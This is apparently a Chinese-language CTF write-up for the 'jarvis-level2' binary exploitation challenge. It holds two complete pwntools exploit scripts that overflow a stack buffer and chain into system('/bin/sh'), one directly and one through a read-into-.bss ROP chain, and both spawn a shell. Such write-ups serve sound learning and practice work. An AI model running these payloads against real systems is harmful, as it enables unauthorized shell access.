Keep Calm and Carry On

jarvis-level2

Posted on
返回到system("/bin/sh")

level2

0x01 分析

  1. 查看文件类型,以及开启的安全机制,没有开启ASLR

  2. IDA查看漏洞,而且还有system函数的调用,那就要看看是不是有字符串”/bin/sh”

0x02 利用思路

方法1:布置一个system(“/bin/sh”)的栈帧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

flag = True
if flag:
    elf = ELF('./level2')
    p = process(elf.path)
    # gdb.attach(p, 'b main')
else:
    host = '127.0.0.1'
    port = 8888
    p = remote(host, port)

binsh = elf.search("/bin/sh").next()
system = elf.plt['system']

payload = 'A' * (0x88 + 0x4) + p32(system) + p32(0xdeadbeef) + p32(binsh)
p.recvline()
p.sendline(payload)
p.interactive()

方法2:布置一个read函数的栈帧,输入”/bin/sh”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

flag = True
if flag:
    elf = ELF('./level2')
    p = process(elf.path)
    # gdb.attach(p, 'b main')
else:
    host = '127.0.0.1'
    port = 8888
    p = remote(host, port)
bss = elf.bss() + 0x08
pop3ret = 0x08048519
system = elf.plt['system']
read = elf.plt['read']
read_args = p32(0) + p32(bss) + p32(20) # 最后的参数20大小要大于“/bin/sh"长度
payload = 'A' * 0x8c + p32(read) + p32(pop3ret) + read_args + p32(system) + p32(0xdeadbeef) + p32(bss)
p.recvline()
p.sendline(payload)
p.sendline("/bin/sh\x00")
p.interactive()